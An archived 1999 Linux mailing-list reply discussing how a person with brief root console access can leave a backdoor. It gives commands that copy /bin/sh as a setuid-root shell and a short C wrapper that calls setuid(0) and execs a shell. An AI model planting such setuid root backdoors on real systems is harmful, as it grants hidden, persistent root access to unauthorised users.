[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]
Re: Hi all,
On Fri, 18 Jun 1999 sudheer@xxxxxxxxxxxxx wrote:
> >
> > Rebooting the machine and changing root password is a very long shot. A
> > hacker can root account simply by sitting on console when root has gone
> > for pee , try this,
> >
> > root>cp /bin/sh /bin/mysh
> > root>chmod +s /bin/mysh
> > root>chmod +x /bin/mysh 'may not be required.
> >
> > That's all, now go away and login as any user from any where in the
> > world,
> >
> > anyuser>whoami
> > anyuser
> > anyuser>/bin/mysh
> > anyuser>whoami
> > root
>
> This won't work. the shells are more intelligent nowadays.
> they behave according to the uid of the process invoking the shell.
> just like that of a 'passwd' program. eventhough the setuid bit is
> set for the 'passwd' program, a normal user can't change the passwd of
> another user even if he knows the other person's passwd.
>
> please, correct me if am wrong.
>
> sudheer
OK, it not might work in bash, but the simple wrapper program would:
main()
{
setuid(0); setgid(0);
execl("/bin/sh", "sh", 0);
}
compile this program and make it setuid (chmod 4755 a.out) and run it
instead of bash.
Lokesh.
>
>
> --------------------------------------------------------------------
> For more information on Linux in India visit http://www.linux-india.org/
> Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
> Flame baits will not be tolerated. If you can appreciate satire read
> http://www.templetons.com/brad/emily.html
>
- --------------------------------------------------------------------
For more information on Linux in India visit http://www.linux-india.org/
Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
Flame baits will not be tolerated. If you can appreciate satire read
http://www.templetons.com/brad/emily.html
------------------------------